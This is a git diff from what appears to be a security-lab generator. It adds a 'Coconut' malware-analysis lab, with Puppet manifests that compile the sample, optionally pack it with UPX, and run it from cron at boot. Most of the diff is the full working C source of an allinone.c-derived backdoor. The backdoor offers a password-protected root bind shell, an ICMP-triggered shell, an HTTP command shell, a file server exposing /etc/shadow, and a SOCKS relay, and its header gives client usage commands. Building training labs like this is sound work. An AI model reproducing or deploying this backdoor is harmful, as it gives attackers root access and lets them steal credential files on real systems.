op[strlen(op) - 1] = 0; + f = fopen(op, "r"); + if (f == NULL) + { + writen_file(fd, erro, strlen(erro)); + return erro; + } + + while( !feof(f) ) + { + i = fread(ret_buf, 1, 32768, f); + if (i == 0) break; + writen_file(fd, ret_buf, i); + } + fclose(f); + exit(0); + } + writen_file(fd, erro, strlen(erro)); + close(fd); + exit(-1); +} + + +ssize_t writen_file(int fd, const void *vptr, size_t n) +{ + size_t nleft; + ssize_t nwritten; + const char *ptr; + ptr = vptr; + nleft = n; + while(nleft > 0) + { + if((nwritten = write(fd, ptr, nleft)) <= 0) + { + if(errno == EINTR) + nwritten = 0; + else + return(-1); + } + nleft -= nwritten; + ptr += nwritten; + } + return(n); +} + +int bind_shell(int port) +{ + int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time; + char passwd[15]; + + struct sockaddr_in serv_addr; + struct sockaddr_in client_addr; + struct timeval testtime; + + setuid(0); + setgid(0); + seteuid(0); + setegid(0); + + chdir("/tmp"); + + soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + + if (soc_des == -1) + exit(-1); + + bzero((char *) &serv_addr,sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); + serv_addr.sin_port = htons(port); + + soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); + + if (soc_rc != 0) + exit(-1); + if (fork() != 0) + exit(0); + setpgrp(); + if (fork() != 0) + exit(0); + soc_rc = listen(soc_des, 5); + if (soc_rc != 0) + exit(0); + + testtime.tv_sec = TIMEOUT; + testtime.tv_usec = 0; + + alarm(TIMEOUT); + soc_len = sizeof(client_addr); + soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); + + if (soc_cli < 0) + exit(0); + alarm(0); + + cli_pid = getpid(); + server_pid = fork(); + + if (server_pid != 0) + { + write(soc_cli, GIVEPASS, strlen(GIVEPASS)); + recv(soc_cli, passwd, sizeof(passwd), 0); + + for (i = 0; i < strlen(passwd); i++) + { + if (passwd[i] == '\n' || passwd[i] == '\r') + { + passwd[i] = '\0'; + } + } + + if (strcmp(passwd, $GNUPLIB) != 0) + { + close(soc_cli); + close(soc_rc); + exit(-1); + } + + write(soc_cli, _$PRINT, strlen(_$PRINT)); + for (i = 0; i < 3; i++) + { + dup2(soc_cli, i); + } + + execl("/bin/sh","sh",(char *)0); + close(soc_cli); + close(soc_rc); + exit(1); + } + close(soc_cli); + close(soc_rc); + exit(0); +} + +int get_shell(int fd) +{ + int i; + setuid(0); + setgid(0); + + chdir("/tmp"); + write(fd, _$PRINT, strlen(_$PRINT)); + for (i = 0; i < 3; i++) + { + dup2(fd, i); + } + execl("/bin/sh","sh",(char *)0); + close(fd); + return 1; +} + +int icmp_shell() +{ + int i, s, size, fromlen, port = ICMP_PORT; + char pkt[4096]; + + struct protoent *proto; + struct sockaddr_in from; + + proto = getprotobyname("icmp"); + + if((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) + exit(0); + + while(1) + { + do + { + fromlen = sizeof(from); + if((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *)&from, &fromlen)) < 0) + printf("", size - 28); + }while(size != SIZEPACK + 28); + + switch(fork()) + { + case -1: + continue; + + case 0: + bind_shell(port); + exit (0); + } + } + return 1; +} + +int socks(int listenp, char *targeth, int targetp) +{ + int listfd, outside, inside, size; + pthread_t thread1; + struct sockaddr_in client; + + if(!(listfd = create_socket())) exit(1); + if(!(create_serv(listfd, listenp))) exit(1); + + for(;;) + { + size = sizeof(struct sockaddr); + if((outfd = accept(listfd, (struct sockaddr *)&client, &size)) < 0) + { + continue; + } + + if(!(infd=create_socket())) exit(1); + if(!(client_connect(infd, targeth, targetp))) quit(outfd, infd, listfd); + + maxfd = max(outfd, infd) + 1; + pthread_create(&thread1, NULL, (void *)&out2in, NULL); + } + close(listfd); +} + +int create_socket() +{ + int sockfd; + + if((sockfd = socket(AF_INET, SOCK_STREAM, 0))<0) + { + return(0); + } + return(sockfd); +} + +int create_serv(int sockfd, int port) +{ + struct sockaddr_in srvaddr; + + bzero(&srvaddr, sizeof(struct sockaddr)); + srvaddr.sin_port = htons(port); + srvaddr.sin_family = AF_INET; + srvaddr.sin_addr.s_addr = htonl(INADDR_ANY); + + if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0) + { + return(0); + } + + if(listen(sockfd,CONNECT_NUMBER)<0) + { + return(0); + } + return(1); +} + +int client_connect(int sockfd, char *server, int port) +{ + struct sockaddr_in cliaddr; + struct hostent *host; + + if(!(host = gethostbyname(server))) + { + return(0); + } + + bzero(&cliaddr, sizeof(struct sockaddr)); + cliaddr.sin_family = AF_INET; + cliaddr.sin_port = htons(port); + cliaddr.sin_addr = *((struct in_addr *)host->h_addr); + + if(connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)) < 0) + { + return(0); + } + return(1); +} + +int quit(int a, int b, int c) +{ + close(a); + close(b); + close(c); + exit(1); +} + +void out2in() +{ + struct timeval timeset; + fd_set readfd, writefd; + int result, i = 0; + char read_in1[MAXSIZE], send_out1[MAXSIZE]; + char read_in2[MAXSIZE], send_out2[MAXSIZE]; + int read1 = 0, totalread1 = 0, send1=0; + int read2 = 0, totalread2 = 0, send2=0; + int out_fd, in_fd; + + out_fd = outfd; + in_fd = infd; + + bzero(read_in1, MAXSIZE); + bzero(read_in2, MAXSIZE); + bzero(send_out1, MAXSIZE); + bzero(send_out2, MAXSIZE); + + timeset.tv_sec = TIMEOUT; + timeset.tv_usec = 0; + + while(1) + { + FD_ZERO(&readfd); + FD_ZERO(&writefd); + + FD_SET(out_fd, &readfd); + FD_SET(in_fd, &writefd); + FD_SET(out_fd, &writefd); + FD_SET(in_fd, &readfd); + + result = select(maxfd, &readfd, &writefd, NULL, NULL); + if(result < 0) + { + return; + } + else + if(result == 0) + { + return; + } + + if(FD_ISSET(out_fd, &readfd)) + { + read1 = recv(out_fd, read_in1, MAXSIZE, 0); + if(read1 == 0) break; + if(read1 < 0) + { + return; + } + memcpy(send_out1 + totalread1, read_in1, read1); + totalread1 += read1; + bzero(read_in1, MAXSIZE); + } + if(FD_ISSET(in_fd, &writefd)) + { + while(totalread1 > 0) + { + send1 = write(in_fd, send_out1, totalread1); + if(send1 == 0)break; + if(send1 < 0) + { + continue; + } + totalread1 -= send1; + } + bzero(send_out1, MAXSIZE); + } + + if(FD_ISSET(in_fd, &readfd)) + { + read2 = recv(in_fd, read_in2, MAXSIZE, 0); + if(read2 == 0) break; + if(read2 < 0) + { + return; + } + + memcpy(send_out2 + totalread2, read_in2, read2); + totalread2 += read2; + bzero(read_in2, MAXSIZE); + } + + if(FD_ISSET(out_fd, &writefd)) + { + while(totalread2 > 0) + { + send2 = write(out_fd, send_out2, totalread2); + if(send2 == 0) break; + if(send2 < 0) + { + continue; + } + + totalread2 -= send2; + } + bzero(send_out2, MAXSIZE); + } + } + close(out_fd); + close(in_fd); + return; +} + +char x2c(char *what) +{ + register char digit; + + digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0')); + digit *= 16; + digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0')); + return (digit); +} + + +void unescape_url(char *url) +{ + register int x, y; + + for(x = 0 , y = 0; url[y]; ++x, ++y) + { + if((url[x] = url[y]) == '%') + { + url[x] = x2c(&url[y + 1]); + y += 2; + } + } + url[x] = '\0'; +} + +void plustospace(char *str) +{ + register int x; + + for(x = 0; str[x]; x++) + if (str[x] == '+') + str[x] = ' '; +} + diff --git a/modules/utilities/unix/malware/coconut/manifests/install.pp b/modules/utilities/unix/malware/coconut/manifests/install.pp new file mode 100644 index 000000000..ccb8a4726 --- /dev/null +++ b/modules/utilities/unix/malware/coconut/manifests/install.pp @@ -0,0 +1,78 @@ +class coconut::install { + $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file) + $coconut_config = parsejson($secgen_parameters['coconut_config'][0]) + $account = parsejson($secgen_parameters['account'][0]) + $username = $account['username'] + $include_source = str2bool($coconut_config['include_source']) + $pack_binary = str2bool($coconut_config['pack_binary']) + $welcome_msg_code = $coconut_config['welcome_msg_code'] + $bd_timeout = $coconut_config['bd_timeout'] + $http_bd_port = $coconut_config['http_bd_port'] + $icmp_bd_port = $coconut_config['icmp_bd_port'] + $bind_bd_port = $coconut_config['bind_bd_port'] + $transport_port = $coconut_config['transport_port'] + $bd_password = $coconut_config['bd_password'] + + # Generate the C file (either in the home directory or the supplied storage_directory) + $install_dir = "/home/$username/malware" + $c_file_path = "$install_dir/coconut.c" + + # Create install dir + ::secgen_functions::create_directory { "create_$install_dir": + path => $install_dir, + notify => File["create $install_dir/coconut.c"], + } + + # Create C file + file { "create $install_dir/coconut.c": + path => $c_file_path, + # source => 'puppet:///modules/coconut/coconut.c', + content => template('coconut/coconut.c.erb'), + mode => '0777', + } + + # Compile binary + exec { "gcc $install_dir/coconut.c": + cwd => $install_dir, + command => "/usr/bin/gcc -o coconut_unpacked coconut.c -lpthread", + require => File["create $install_dir/coconut.c"], + } + + if $pack_binary { + # Pack with upx + notice("Packing Coconut binary with UPX") + ensure_packages('upx-ucl') + exec { "upx $install_dir/coconut": + cwd => $install_dir, + command => "/usr/bin/upx -o coconut coconut_unpacked", + require => Exec["gcc $install_dir/coconut.c"] + } + unless $include_source { + notice("Removing coconut.c source code file") + exec { "Removing coconut.c file": + cwd => $install_dir, + command => "/bin/rm $install_dir/coconut.c", + require => Exec["upx $install_dir/coconut"], + } + } + exec { "rm unpacked binary": + cwd => $install_dir, + command => "/bin/rm $install_dir/coconut_unpacked", + require => Exec["upx $install_dir/coconut"] + } + } else { + notice("No packer used, renaming Coconut binary") + exec { "rename unpacked binary": + cwd => $install_dir, + command => "/bin/mv $install_dir/coconut_unpacked $install_dir/coconut", + } + unless $include_source { + notice("Removing coconut.c source code file") + exec { "Removing coconut.c file": + cwd => $install_dir, + command => "/bin/rm $install_dir/coconut.c", + require => Exec["rename unpacked binary"] + } + } + } +} diff --git a/modules/utilities/unix/malware/coconut/manifests/service.pp b/modules/utilities/unix/malware/coconut/manifests/service.pp new file mode 100644 index 000000000..60d076f8f --- /dev/null +++ b/modules/utilities/unix/malware/coconut/manifests/service.pp @@ -0,0 +1,19 @@ +class coconut::service { + # If we've got a port supplied, host the binary over the network. Otherwise do nothing + $secgen_parameters = secgen_functions::get_parameters($::base64_inputs_file) + $account = parsejson($secgen_parameters['account'][0]) + $username = $account['username'] + $run_sample = str2bool($secgen_parameters['run_sample'][0]) + + if $run_sample { + notice("COCONUT run_sample $run_sample: Running sample on reboot via cron... ") + + # run on each boot via cron + cron { "cron run on reboot /home/${username}/malware/coconut": + command => "sleep 60; /home/${$username}/malware/coconut", + special => 'reboot', + } + } else { + notice("COCONUT run_sample $run_sample: Not running sample... ") + } +} \ No newline at end of file diff --git a/modules/utilities/unix/malware/coconut/secgen_metadata.xml b/modules/utilities/unix/malware/coconut/secgen_metadata.xml new file mode 100644 index 000000000..96a059cfd --- /dev/null +++ b/modules/utilities/unix/malware/coconut/secgen_metadata.xml @@ -0,0 +1,50 @@ + + + + Coconut + Thomas Shaw + Mo Hassan + MIT + Coconut malware sample (based on allinone.c). Compiles binary and drops C file on the box. + malware_sample + linux + https://packetstormsecurity.com/files/29898/allinone.c.html + + account + run_sample + coconut_config + + + false + + + + + + challenger + + + tiaspbiqe2r + + + + + + + + + + update + + + + utilities/unix/system/parameterised_accounts + + + + .*/reversing_tools + + + diff --git a/modules/utilities/unix/malware/coconut/templates/coconut.c.erb b/modules/utilities/unix/malware/coconut/templates/coconut.c.erb new file mode 100644 index 000000000..5c2b80562 --- /dev/null +++ b/modules/utilities/unix/malware/coconut/templates/coconut.c.erb @@ -0,0 +1,805 @@ +/************************************************************************ +* coconut.c is based on allinone.c +* +* a Http server, +* a sockets transmit server, +* a shell backdoor, +* a icmp backdoor, +* a bind shell backdoor, +* a like http shell, +* it can translate file from remote host, +* it can give you a socks5 proxy, +* it can use for to attack, jumps the extension, Visits other machines. +* it can give you a root shell.:) +* +* Usage: +* compile: +* gcc -o allinone allinone.c -lpthread +* run on target: +* ./coconut +* +* 1.httpd server +* Client: +* http://target:9009/givemefile/etc/passwd +* lynx -dump http://target:9009/givemefile/etc/shadow > shadow +* or wget http://target:9009/givemefile/etc/shadow +* +* 2.icmp backdoor +* Client: +* ping -l 101 target (on windows) +* ping -s 101 -c 4 target (on linux) +* nc target 8090 +* allesgute:) --> your password +* +* 3.shell backdoor +* Client: +* nc target 9009 +* allesgute:) --> your password +* +* 4.bind a root shell on your port +* Client: +* http://target:9009/bindport:8899 +* nc target 8899 +* allesgute:) --> your password +* +* 5.sockets transmit +* Client: +* http://target:9009/socks/:local listen port::you want to tran ip:::you want to tran port +* http://target:9009/socks/:1080::192.168.0.1:::21 +* nc target 1080 +* +* 6.http shell +* Client: +* http://target:9009/givemeshell:ls -al (no pipe) +* +* ps: +* All bind shell have a passwd, default is: allesgute:) +* All bind shell will close, if Two minutes do not have the connection. +* All bind shell only can use one time until reactivates. +* +* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others) +* Thx bkbll's Transmit code, and thx Neil,con,iceblood for test. +* +************************************************************************/ +<%="#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include "-%> + + +#define HTTPD_PORT <%= @http_bd_port %> +#define BIND_PORT <%= @bind_bd_port %> +#define ICMP_PORT <%= @icmp_bd_port %> +#define TRAN_PORT <%= @transport_port %> +#define SIZEPACK 101 +#define MAXSIZE 32768 +#define TIMEOUT <%= @bd_timeout %> +#define CONNECT_NUMBER 1 +#define HIDEME "[login] " +#define HIDEICMP "[su] " +#define HIDEFILE "[bash] " +#define GET_FILE "givemefile" +#define SHELL_NAME "givemeshell" +#define BIND_NAME "bindport" +#define TRAN_NAME "socks" +#define DISPART ":" +#define DISPART1 "::" +#define DISPART2 ":::" +#define $GNUPLIB "<%= @bd_password -%>" +#define _$PRINT "\r\n======== Welcome to Year 2068 ========\r\n========== :)=========\r\n========== Code: <%= @welcome_msg_code -%> ==========\r\n\r\nYour command: \0" +#define GIVEPASS "\r\nEnter Your password: \0" + +#define max(a, b) (a)>(b)?(a) : (b) + +int maxfd, infd, outfd; +unsigned char ret_buf[32768]; + +int daemon_init(); +void sig_chid(); +int TCP_listen(); +char* read_file(); +ssize_t writen_file(); +int bind_shell(); +int get_shell(); +int icmp_shell(); +int socks(); +int create_socket(); +int create_serv(); +int client_connect(); +int quit(); +void out2in(); +char x2c(); +void unescape_url(); +void plustospace(); + +int main(int argc, char *argv[]) +{ + int fd, len, i, icmp; + int csocket; + struct sockaddr_in caddr; + char readstr[4000]; + char *cbuf; + pid_t pid; + + signal(SIGCHLD, sig_chid); + daemon_init(); + + if((pid = fork()) == -1) exit(0); + if(pid <= 0) + { + strcpy(argv[0], HIDEICMP); + icmp_shell(); + } + + fd = TCP_listen(HTTPD_PORT); + if(fd <= 0) return -1; + + for(;;) + { + strcpy(argv[0], HIDEME); + + len = sizeof(caddr); + if((csocket = accept(fd, &caddr, &len)) < 0) continue; + if((pid = fork()) == -1) continue; + if(pid <= 0) + { + strcpy (argv[0], HIDEFILE); + i = recv(csocket, readstr, 4000,0); + if (i == -1) break; + if( readstr[ i -1 ] != '\n' ) break; + readstr [i] = '\0'; + cbuf = read_file(readstr, csocket); + close(csocket); + } + close(csocket); + } + close(fd); + return(1); +} + + +int daemon_init() +{ + struct sigaction act; + int i, maxfd; + + if(fork() != 0) exit(0); + if(setsid() < 0) return(-1); + + act.sa_handler = SIG_IGN; + act.sa_flags = 0; + + sigaction(SIGHUP, &act, 0); + + if(fork() != 0) exit(0); + + chdir("/tmp"); + umask(0); + maxfd = sysconf(_SC_OPEN_MAX); + for(i=0; <%="i; i++) + close(i); + open("/dev/null", O_RDWR); + dup(0); + dup(1); + dup(2); + return(0); +} + + +void sig_chid(int signo) +{ + pid_t pid; + int stat; + while((pid = waitpid(-1, &stat, WNOHANG))>0); + printf("children %d died\n", pid); + return; +} + +int TCP_listen(int port) +{ + struct sockaddr_in laddr ; + int fd; + socklen_t len ; + fd = socket(AF_INET, SOCK_STREAM, 0); + len = sizeof(laddr) ; + memset(&laddr, 0, len) ; + laddr.sin_addr.s_addr = htonl(INADDR_ANY) ; + laddr.sin_family = AF_INET ; + laddr.sin_port = htons(port) ; + if((bind(fd, (const struct sockaddr *)&laddr, len))) return(-1); + if(listen(fd, 5)) return(-1); + return(fd); +} + +char * read_file(char *buf, int fd) +{ + char *erro= + "Content-type: text/html\n\n" + "HTTP/1.1 404 Not Found\n" + "Date: 1 Jan 2060 03:19:55 GMT\n" + "Server: Apache/99.98.97 (RoboUnix)\n" + "Connection: close\n" + "Content-Type: text/html\n\n" + <%='"\n" + "\n" + "404 Not Found\n" + "\n" + "

Not Found

\n" + "The requested URL was not found on this server.

\n" + "

\n" + "
Apache/99.98.97 Server at localhost Port 9009
\n" + "\n\n"; '%> + + char *bindok= + "Content-type: text/html\n\n" + <%='"\nBind Shell ok.:)\n" + "\n" + "

\n" + "\n" + "You get it, goodluck! :-)\n" + "


\n" + "\n\n";'%> + + char *tranok= + <%='"Content-type: text/html\n\n" + "\nTran ok.:)\n" + "\n" + "

\n" + "\n" + "Tran ok!\n" + "


\n" + "\n\n";'%> + + char *httpok1= + <%='"Content-type: text/html\n\n" + "\nShell ok.:)\n" + "\n" + "
\n" + "
\n";'%>
+
+	char *httpok2=
+  <%='"

\n" + "\n\n";'%> + + char *yourcom= + <%='"Your Command:\n";'%> + + char *br= + <%='"
\n";'%> + + int listenp, targetp, i, j, c, bport; + char *cmd, *par, *op, *hp, *tp, *targeth, *command; + char *swap_file = "/tmp/tmp.txt"; + char *setpath = "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:."; + FILE *f; + + cmd = buf; + par = strstr(cmd, $GNUPLIB); + if(par != NULL) + { + get_shell(fd); + exit(0); + } + + par = strstr(cmd, BIND_NAME); + op = strstr(cmd, DISPART); + if(par != NULL && op != NULL) + { + bport = atoi(op + strlen(DISPART)); + if(bport <= 0) + bport = BIND_PORT; + write(fd, bindok, strlen(bindok)); + close(fd); + bind_shell(bport); + exit(0); + } + + par = strstr(cmd, TRAN_NAME); + op = strstr(cmd, DISPART); + hp = strstr(cmd, DISPART1); + tp = strstr(cmd, DISPART2); + if(par != NULL && op != NULL && hp != NULL && tp != NULL) + { + listenp = atoi(op + strlen(DISPART)); + if(listenp <= 0) + listenp = TRAN_PORT; + targetp = atoi(tp + strlen(DISPART2)); + if(targetp <= 0) + targetp = 23; + + hp = (hp + strlen(DISPART1)); + targeth = strncpy(ret_buf, hp,strlen(hp) - strlen(tp)); + targeth[strlen(hp) - strlen(tp)] = '\0'; + + write(fd, tranok, strlen(tranok)); + close(fd); + socks(listenp, targeth, targetp); + exit(0); + } + + par = strstr(cmd, SHELL_NAME); + op = strstr(cmd, DISPART); + if(par != NULL && op != NULL) + { + tp = buf + 5 + strlen(SHELL_NAME) + strlen(DISPART); + hp = strstr(tp, "HTTP"); + if(hp != NULL) *hp = '\0'; + tp[strlen(tp) - 1] = 0; + plustospace(tp); + unescape_url(tp); + + c = j = strlen(tp); + tp[j] = ' ';j++; + tp[j] = ' ';j++; + tp[j] = '>';j++; + tp[j] = ' ';j++; + for(i = 0; i <= strlen(swap_file); i++, j++) + { + tp[j] = swap_file[i]; + } + tp[j + strlen(swap_file)] = '\0'; + + command = tp; + setuid(0); + setgid(0); + chdir("/tmp"); + putenv(setpath); + system(command); + + f = fopen(swap_file, "r"); + if (f == NULL) + { + writen_file(fd, erro, strlen(erro)); + return erro; + } + + writen_file(fd, httpok1, strlen(httpok1)); + writen_file(fd, yourcom, strlen(yourcom)); + writen_file(fd, command, c); + writen_file(fd, br, strlen(br)); + writen_file(fd, br, strlen(br)); + while( !feof(f) ) + { + i = fread(ret_buf, 1, 32768, f); + if (i == 0) break; + writen_file(fd, ret_buf, i); + } + fclose(f); + writen_file(fd, br, strlen(br)); + writen_file(fd, httpok2, strlen(httpok2)); + remove(swap_file); + exit(0); + } + + par = NULL; + par = strstr(cmd, GET_FILE); + if(par != NULL) + { + op = buf + 5 + strlen(GET_FILE); + tp = strstr(op, "HTTP"); + if(tp != NULL) *tp = '\0'; + op[strlen(op) - 1] = 0; + f = fopen(op, "r"); + if (f == NULL) + { + writen_file(fd, erro, strlen(erro)); + return erro; + } + + while( !feof(f) ) + { + i = fread(ret_buf, 1, 32768, f); + if (i == 0) break; + writen_file(fd, ret_buf, i); + } + fclose(f); + exit(0); + } + writen_file(fd, erro, strlen(erro)); + close(fd); + exit(-1); +} + + +ssize_t writen_file(int fd, const void *vptr, size_t n) +{ + size_t nleft; + ssize_t nwritten; + const char *ptr; + ptr = vptr; + nleft = n; + while(nleft > 0) + { + if((nwritten = write(fd, ptr, nleft)) <= 0) + { + if(errno == EINTR) + nwritten = 0; + else + return(-1); + } + nleft -= nwritten; + ptr += nwritten; + } + return(n); +} + +int bind_shell(int port) +{ + int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid, i, time; + char passwd[15]; + + struct sockaddr_in serv_addr; + struct sockaddr_in client_addr; + struct timeval testtime; + + setuid(0); + setgid(0); + seteuid(0); + setegid(0); + + chdir("/tmp"); + + soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); + + if (soc_des == -1) + exit(-1); + + bzero((char *) &serv_addr,sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_addr.s_addr = htonl(INADDR_ANY); + serv_addr.sin_port = htons(port); + + soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr)); + + if (soc_rc != 0) + exit(-1); + if (fork() != 0) + exit(0); + setpgrp(); + if (fork() != 0) + exit(0); + soc_rc = listen(soc_des, 5); + if (soc_rc != 0) + exit(0); + + testtime.tv_sec = TIMEOUT; + testtime.tv_usec = 0; + + alarm(TIMEOUT); + soc_len = sizeof(client_addr); + soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len); + + if (soc_cli < 0) + exit(0); + alarm(0); + + cli_pid = getpid(); + server_pid = fork(); + + if (server_pid != 0) + { + write(soc_cli, GIVEPASS, strlen(GIVEPASS)); + recv(soc_cli, passwd, sizeof(passwd), 0); + + for (i = 0; i < strlen(passwd); i++) + { + if (passwd[i] == '\n' || passwd[i] == '\r') + { + passwd[i] = '\0'; + } + } + + if (strcmp(passwd, $GNUPLIB) != 0) + { + close(soc_cli); + close(soc_rc); + exit(-1); + } + + write(soc_cli, _$PRINT, strlen(_$PRINT)); + for (i = 0; i < 3; i++) + { + dup2(soc_cli, i); + } + + execl("/bin/sh","sh",(char *)0); + close(soc_cli); + close(soc_rc); + exit(1); + } + close(soc_cli); + close(soc_rc); + exit(0); +} + +int get_shell(int fd) +{ + int i; + setuid(0); + setgid(0); + + chdir("/tmp"); + write(fd, _$PRINT, strlen(_$PRINT)); + for (i = 0; i < 3; i++) + { + dup2(fd, i); + } + execl("/bin/sh","sh",(char *)0); + close(fd); + return 1; +} + +int icmp_shell() +{ + int i, s, size, fromlen, port = ICMP_PORT; + char pkt[4096]; + + struct protoent *proto; + struct sockaddr_in from; + + proto = getprotobyname("icmp"); + + if((s = socket(AF_INET, SOCK_RAW, proto->p_proto)) < 0) + exit(0); + + while(1) + { + do + { + fromlen = sizeof(from); + if((size = recvfrom(s, pkt, sizeof(pkt), 0, (struct sockaddr *)&from, &fromlen)) < 0) + printf("", size - 28); + }while(size != SIZEPACK + 28); + + switch(fork()) + { + case -1: + continue; + + case 0: + bind_shell(port); + exit (0); + } + } + return 1; +} + +int socks(int listenp, char *targeth, int targetp) +{ + int listfd, outside, inside, size; + pthread_t thread1; + struct sockaddr_in client; + + if(!(listfd = create_socket())) exit(1); + if(!(create_serv(listfd, listenp))) exit(1); + + for(;;) + { + size = sizeof(struct sockaddr); + if((outfd = accept(listfd, (struct sockaddr *)&client, &size)) < 0) + { + continue; + } + + if(!(infd=create_socket())) exit(1); + if(!(client_connect(infd, targeth, targetp))) quit(outfd, infd, listfd); + + maxfd = max(outfd, infd) + 1; + pthread_create(&thread1, NULL, (void *)&out2in, NULL); + } + close(listfd); +} + +int create_socket() +{ + int sockfd; + + if((sockfd = socket(AF_INET, SOCK_STREAM, 0))<0) + { + return(0); + } + return(sockfd); +} + +int create_serv(int sockfd, int port) +{ + struct sockaddr_in srvaddr; + + bzero(&srvaddr, sizeof(struct sockaddr)); + srvaddr.sin_port = htons(port); + srvaddr.sin_family = AF_INET; + srvaddr.sin_addr.s_addr = htonl(INADDR_ANY); + + if(bind(sockfd, (struct sockaddr *)&srvaddr, sizeof(struct sockaddr))<0) + { + return(0); + } + + if(listen(sockfd,CONNECT_NUMBER)<0) + { + return(0); + } + return(1); +} + +int client_connect(int sockfd, char *server, int port) +{ + struct sockaddr_in cliaddr; + struct hostent *host; + + if(!(host = gethostbyname(server))) + { + return(0); + } + + bzero(&cliaddr, sizeof(struct sockaddr)); + cliaddr.sin_family = AF_INET; + cliaddr.sin_port = htons(port); + cliaddr.sin_addr = *((struct in_addr *)host->h_addr); + + if(connect(sockfd, (struct sockaddr *)&cliaddr, sizeof(struct sockaddr)) < 0) + { + return(0); + } + return(1); +} + +int quit(int a, int b, int c) +{ + close(a); + close(b); + close(c); + exit(1); +} + +void out2in() +{ + struct timeval timeset; + fd_set readfd, writefd; + int result, i = 0; + char read_in1[MAXSIZE], send_out1[MAXSIZE]; + char read_in2[MAXSIZE], send_out2[MAXSIZE]; + int read1 = 0, totalread1 = 0, send1=0; + int read2 = 0, totalread2 = 0, send2=0; + int out_fd, in_fd; + + out_fd = outfd; + in_fd = infd; + + bzero(read_in1, MAXSIZE); + bzero(read_in2, MAXSIZE); + bzero(send_out1, MAXSIZE); + bzero(send_out2, MAXSIZE); + + timeset.tv_sec = TIMEOUT; + timeset.tv_usec = 0; + + while(1) + { + FD_ZERO(&readfd); + FD_ZERO(&writefd); + + FD_SET(out_fd, &readfd); + FD_SET(in_fd, &writefd); + FD_SET(out_fd, &writefd); + FD_SET(in_fd, &readfd); + + result = select(maxfd, &readfd, &writefd, NULL, NULL); + if(result < 0) + { + return; + } + else + if(result == 0) + { + return; + } + + if(FD_ISSET(out_fd, &readfd)) + { + read1 = recv(out_fd, read_in1, MAXSIZE, 0); + if(read1 == 0) break; + if(read1 < 0) + { + return; + } + memcpy(send_out1 + totalread1, read_in1, read1); + totalread1 += read1; + bzero(read_in1, MAXSIZE); + } + if(FD_ISSET(in_fd, &writefd)) + { + while(totalread1 > 0) + { + send1 = write(in_fd, send_out1, totalread1); + if(send1 == 0)break; + if(send1 < 0) + { + continue; + } + totalread1 -= send1; + } + bzero(send_out1, MAXSIZE); + } + + if(FD_ISSET(in_fd, &readfd)) + { + read2 = recv(in_fd, read_in2, MAXSIZE, 0); + if(read2 == 0) break; + if(read2 < 0) + { + return; + } + + memcpy(send_out2 + totalread2, read_in2, read2); + totalread2 += read2; + bzero(read_in2, MAXSIZE); + } + + if(FD_ISSET(out_fd, &writefd)) + { + while(totalread2 > 0) + { + send2 = write(out_fd, send_out2, totalread2); + if(send2 == 0) break; + if(send2 < 0) + { + continue; + } + + totalread2 -= send2; + } + bzero(send_out2, MAXSIZE); + } + } + close(out_fd); + close(in_fd); + return; +} + +char x2c(char *what) +{ + register char digit; + + digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0')); + digit *= 16; + digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0')); + return (digit); +} + + +void unescape_url(char *url) +{ + register int x, y; + + for(x = 0 , y = 0; url[y]; ++x, ++y) + { + if((url[x] = url[y]) == '%') + { + url[x] = x2c(&url[y + 1]); + y += 2; + } + } + url[x] = '\0'; +} + +void plustospace(char *str) +{ + register int x; + + for(x = 0; str[x]; x++) + if (str[x] == '+') + str[x] = ' '; +} + diff --git a/modules/utilities/unix/live_malware_samples/live_malware_samples.pp b/modules/utilities/unix/malware/live_malware_samples/live_malware_samples.pp similarity index 100% rename from modules/utilities/unix/live_malware_samples/live_malware_samples.pp rename to modules/utilities/unix/malware/live_malware_samples/live_malware_samples.pp diff --git a/modules/utilities/unix/live_malware_samples/manifests/install.pp b/modules/utilities/unix/malware/live_malware_samples/manifests/install.pp similarity index 100% rename from modules/utilities/unix/live_malware_samples/manifests/install.pp rename to modules/utilities/unix/malware/live_malware_samples/manifests/install.pp diff --git a/modules/utilities/unix/live_malware_samples/secgen_metadata.xml b/modules/utilities/unix/malware/live_malware_samples/secgen_metadata.xml similarity index 93% rename from modules/utilities/unix/live_malware_samples/secgen_metadata.xml rename to modules/utilities/unix/malware/live_malware_samples/secgen_metadata.xml index 91d3c3fe7..8241834e5 100644 --- a/modules/utilities/unix/live_malware_samples/secgen_metadata.xml +++ b/modules/utilities/unix/malware/live_malware_samples/secgen_metadata.xml @@ -14,6 +14,6 @@ linux - .*/git$ + .*/git diff --git a/scenarios/labs/software_and_malware_analysis/11_coconut.xml b/scenarios/labs/software_and_malware_analysis/11_coconut.xml new file mode 100644 index 000000000..8ad73789e --- /dev/null +++ b/scenarios/labs/software_and_malware_analysis/11_coconut.xml @@ -0,0 +1,233 @@ + + + + + Malware Behaviour: Live Sample Analysis + Tom Shaw + Mo Hassan + A Hackerbot lab involving the analysis of a live malware sample. + + hackerbot-lab + ctf-lab + lab-sheet + intermediate + + + dimensions + kinds + + + analysis techniques + analysis environments + + + + desktop + + + + 172.16.0.2 + 172.16.0.3 + 172.16.0.4 + + + + + 